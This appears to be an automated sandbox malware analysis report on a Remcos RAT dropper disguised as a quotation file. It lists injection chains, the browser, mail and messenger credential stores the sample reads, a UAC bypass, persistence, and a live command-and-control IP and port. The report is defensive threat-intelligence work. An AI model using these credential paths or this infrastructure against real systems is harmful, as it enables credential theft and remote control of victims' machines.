                        Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 20_2_10002264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,20_2_10002264
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0041B60D GetUserNameW,26_2_0041B60D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,26_2_00449190
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_0041739B GetVersionExW,32_2_0041739B
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: Amcache.hve.25.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                        Source: Amcache.hve.25.drBinary or memory string: msmpeng.exe
                        Source: Amcache.hve.25.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                        Source: Amcache.hve.25.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                        Source: Amcache.hve.25.drBinary or memory string: MsMpEng.exe

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 45.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 45.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.svchost.exe.1e1edc9af50.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.svchost.exe.1e1edc22508.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.svchost.exe.1e1edc9af50.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.svchost.exe.1e1edc22508.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000001A.00000002.1750545324.000000000561A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000002.4011395180.000000000053F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000002.4014378361.0000000000E9F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002D.00000002.1916087250.0000000004E87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000002.4011008508.0000000000507000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.1915952405.000001E1EDBA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2772, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5880, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 4360, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: csc.exe PID: 6408, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: ngen.exe PID: 1112, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data26_2_0040BA12
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data45_2_0040BA12
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\26_2_0040BB30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: \key3.db26_2_0040BB30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\45_2_0040BB30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: \key3.db45_2_0040BB30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: ESMTPPassword37_2_004033F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword37_2_00402DB3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword37_2_00402DB3
                        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1160, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-R7QS5CJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-R7QS5C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-R7QS5C
                        Source: Yara matchFile source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 45.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 45.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.svchost.exe.1e1edc9af50.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.svchost.exe.1e1edc22508.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.svchost.exe.1e1edc9af50.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.svchost.exe.1e1edc22508.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000001A.00000002.1750545324.000000000561A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000002.4011395180.000000000053F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000002.4014378361.0000000000E9F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002D.00000002.1916087250.0000000004E87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000002.4011008508.0000000000507000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.1915952405.000001E1EDBA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2772, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5880, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 4360, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: csc.exe PID: 6408, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: ngen.exe PID: 1112, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: cmd.exe26_2_0040569A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: cmd.exe45_2_0040569A
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information1
                        Scripting
                        Valid Accounts1
                        Windows Management Instrumentation
                        1
                        Scripting
                        1
                        DLL Side-Loading
                        1
                        Disable or Modify Tools
                        2
                        OS Credential Dumping
                        2
                        System Time Discovery
                        Remote Services12
                        Archive Collected Data
                        12
                        Ingress Tool Transfer
                        Exfiltration Over Other Network Medium1
                        System Shutdown/Reboot
                        CredentialsDomainsDefault Accounts111
                        Native API
                        1
                        DLL Side-Loading
                        1
                        Bypass User Account Control
                        11
                        Deobfuscate/Decode Files or Information
                        211
                        Input Capture
                        1
                        Account Discovery
                        Remote Desktop Protocol1
                        Data from Local System
                        2
                        Encrypted Channel
                        Exfiltration Over Bluetooth1
                        Defacement
                        Email AddressesDNS ServerDomain Accounts12
                        Command and Scripting Interpreter
                        1
                        Windows Service
                        1
                        Access Token Manipulation
                        2
                        Obfuscated Files or Information
                        2
                        Credentials in Registry
                        1
                        System Service Discovery
                        SMB/Windows Admin Shares1
                        Email Collection
                        1
                        Remote Access Software
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts1
                        Scheduled Task/Job
                        1
                        Scheduled Task/Job
                        1
                        Windows Service
                        1
                        Timestomp
                        3
                        Credentials In Files
                        3
                        File and Directory Discovery
                        Distributed Component Object Model211
                        Input Capture
                        2
                        Non-Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud Accounts2
                        Service Execution
                        1
                        Registry Run Keys / Startup Folder
                        422
                        Process Injection
                        1
                        DLL Side-Loading
                        LSA Secrets39
                        System Information Discovery
                        SSH3
                        Clipboard Data
                        12
                        Application Layer Protocol
                        Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                        Scheduled Task/Job
                        1
                        Bypass User Account Control
                        Cached Domain Credentials251
                        Security Software Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                        Registry Run Keys / Startup Folder
                        11
                        Masquerading
                        DCSync41
                        Virtualization/Sandbox Evasion
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
                        Virtualization/Sandbox Evasion
                        Proc Filesystem4
                        Process Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                        Access Token Manipulation
                        /etc/passwd and /etc/shadow1
                        Application Window Discovery
                        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron422
                        Process Injection
                        Network Sniffing1
                        System Owner/User Discovery
                        Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1435939 Sample: QUOTATION#30810.exe Startdate: 03/05/2024 Architecture: WINDOWS Score: 100 80 geoplugin.net 2->80 86 Snort IDS alert for network traffic 2->86 88 Multi AV Scanner detection for domain / URL 2->88 90 Found malware configuration 2->90 92 18 other signatures 2->92 9 svchost.exe 3 2->9         started        12 QUOTATION#30810.exe 1 6 2->12         started        15 svchost.exe 2->15         started        17 5 other processes 2->17 signatures3 process4 file5 124 Multi AV Scanner detection for dropped file 9->124 126 Writes to foreign memory regions 9->126 128 Allocates memory in foreign processes 9->128 19 vbc.exe 3 16 9->19         started        24 conhost.exe 9->24         started        34 6 other processes 9->34 72 C:\Users\user\AppData\Roaming\svchost.exe, PE32+ 12->72 dropped 130 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 12->130 132 Drops PE files with benign system names 12->132 26 cmd.exe 1 12->26         started        28 cmd.exe 1 12->28         started        30 conhost.exe 12->30         started        134 Injects a PE file into a foreign processes 15->134 32 ngen.exe 15->32         started        36 2 other processes 15->36 74 C:\Windows\Temp\xrlumlnf.inf, Windows 17->74 dropped 76 C:\Windows\Temp\macatsxh.inf, Windows 17->76 dropped 78 C:\Windows\Temp\54bmrp0l.inf, Windows 17->78 dropped 38 9 other processes 17->38 signatures6 process7 dnsIp8 82 172.245.208.13, 4445, 49708, 49711 AS-COLOCROSSINGUS United States 19->82 84 geoplugin.net 178.237.33.50, 49717, 80 ATOM86-ASATOM86NL Netherlands 19->84 70 C:\ProgramData\remcos\logs.dat, data 19->70 dropped 94 Detected Remcos RAT 19->94 96 Tries to steal Mail credentials (via file registry) 19->96 98 Maps a DLL or memory area into another process 19->98 100 Installs a global keyboard hook 19->100 40 vbc.exe 19->40         started        43 vbc.exe 19->43         started        45 vbc.exe 19->45         started        47 vbc.exe 19->47         started        49 svchost.exe 3 26->49         started        51 timeout.exe 1 26->51         started        53 conhost.exe 26->53         started        102 Uses schtasks.exe or at.exe to add and modify task schedules 28->102 55 conhost.exe 28->55         started        57 schtasks.exe 1 28->57         started        104 Contains functionality to bypass UAC (CMSTPLUA) 32->104 106 Contains functionalty to change the wallpaper 32->106 108 Contains functionality to steal Chrome passwords or cookies 32->108 110 2 other signatures 32->110 file9 signatures10 process11 signatures12 112 Tries to steal Instant Messenger accounts or passwords 40->112 114 Tries to steal Mail credentials (via file / registry access) 40->114 116 Tries to harvest and steal browser information (history, passwords, etc) 43->116 118 Writes to foreign memory regions 49->118 120 Allocates memory in foreign processes 49->120 122 Injects a PE file into a foreign processes 49->122 59 csc.exe 49->59         started        62 conhost.exe 49->62         started        64 vbc.exe 49->64         started        68 2 other processes 49->68 66 svchost.exe 51->66 injected process13 signatures14 136 Contains functionality to bypass UAC (CMSTPLUA) 59->136 138 Detected Remcos RAT 59->138 140 Contains functionalty to change the wallpaper 59->140 142 4 other signatures 59->142

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        QUOTATION#30810.exe58%ReversingLabsByteCode-MSIL.Trojan.Remcos
                        QUOTATION#30810.exe49%VirustotalBrowse
                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Roaming\svchost.exe58%ReversingLabsByteCode-MSIL.Trojan.Remcos
                        C:\Users\user\AppData\Roaming\svchost.exe49%VirustotalBrowse
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        geoplugin.net4%VirustotalBrowse
                        SourceDetectionScannerLabelLink
                        http://schemas.mi0%URL Reputationsafe
                        http://schemas.mi0%URL Reputationsafe
                        http://www.imvu.comr0%URL Reputationsafe
                        http://Passport.NET/STS0%URL Reputationsafe
                        http://geoplugin.net/json.gp/C100%URL Reputationphishing
                        http://geoplugin.net/json.gp/C100%URL Reputationphishing
                        http://Passport.NET/tb0%URL Reputationsafe
                        http://geoplugin.net/json.gp100%URL Reputationphishing
                        http://www.ebuddy.com0%URL Reputationsafe
                        http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
                        http://Passport.NET/tbA0%Avira URL Cloudsafe
                        http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd0%Avira URL Cloudsafe
                        http://geoplugin.net/json.gpl0%Avira URL Cloudsafe
                        http://Passport.NET/tb_0%Avira URL Cloudsafe
                        http://geoplugin.net/json.gpCt0%Avira URL Cloudsafe
                        http://crl.ver)0%Avira URL Cloudsafe
                        172.245.208.130%Avira URL Cloudsafe
                        http://Passport.NET/tbA0%VirustotalBrowse
                        https://login.microsofh0%Avira URL Cloudsafe
                        http://geoplugin.net/json.gpl0%VirustotalBrowse
                        http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd0%VirustotalBrowse
                        172.245.208.1317%VirustotalBrowse
                        http://Passport.NET/tb_0%VirustotalBrowse
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        geoplugin.net
                        178.237.33.50
                        truefalseunknown
                        NameMaliciousAntivirus DetectionReputation
                        http://geoplugin.net/json.gptrue
                        • URL Reputation: phishing
                        unknown
                        172.245.208.13true
                        • 17%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdoft.csvchost.exe, 0000001F.00000003.1792301764.0000013DBB152000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://schemas.misvchost.exe, 0000001F.00000003.1822570517.0000013DBB152000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.imvu.comrvbc.exe, 00000027.00000002.1818948363.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2004/09/policy=80601svchost.exe, 0000001F.00000003.3655794001.0000013DBB16F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3657125389.0000013DBB16F000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSIDsvchost.exe, 0000001F.00000003.1764573088.0000013DBB110000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfsvchost.exe, 0000001F.00000003.1764573088.0000013DBB110000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdodysvchost.exe, 0000001F.00000003.3657144064.0000013DBB179000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB179000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdQsvchost.exe, 0000001F.00000003.3656628429.0000013DBB105000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://account.live.com/inlinesignup.aspx?iww=1&id=80601=svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAsvchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsvchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd.svchost.exe, 0000001F.00000003.3657144064.0000013DBB179000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB179000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 0000001F.00000003.3656046203.0000013DBB13D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://www.nirsoft.netvbc.exe, 00000020.00000002.1858485035.0000000000EE4000.00000004.00000010.00020000.00000000.sdmpfalse
                                                high
                                                https://login.microsoftonline.com/ppsecure/ResolveUser.srfsvchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://Passport.NET/tbAsvchost.exe, 0000001F.00000003.3657144064.0000013DBB179000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB179000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • 0%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdns:samsvchost.exe, 0000001F.00000003.1792301764.0000013DBB152000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://Passport.NET/STSsvchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionIDsvchost.exe, 0000001F.00000003.1816023590.0000013DBB157000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comvbc.exe, 00000027.00000002.1818948363.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAsvchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.google.comvbc.exe, vbc.exe, 00000027.00000002.1818948363.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                            high
                                                            https://account.live.com/InlineSignup.aspx?iww=1&id=80502y0svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuesvchost.exe, 0000001F.00000003.3655794001.0000013DBB16F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3657125389.0000013DBB16F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdcredsvchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://geoplugin.net/json.gp/Csvchost.exe, 0000000B.00000002.1915952405.000001E1EDBA7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, csc.exe, 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ngen.exe, 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmptrue
                                                                  • URL Reputation: phishing
                                                                  • URL Reputation: phishing
                                                                  unknown
                                                                  https://account.live.com/InlineSignup.aspx?iww=1&id=8svchost.exe, 0000001F.00000002.3658207088.0000013DBA909000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1822188194.0000013DBA902000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://account.live.com/isvchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdpSesvchost.exe, 0000001F.00000003.1792301764.0000013DBB152000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdssvchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3657217744.0000013DBB181000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB179000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823387561.0000013DBB17F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
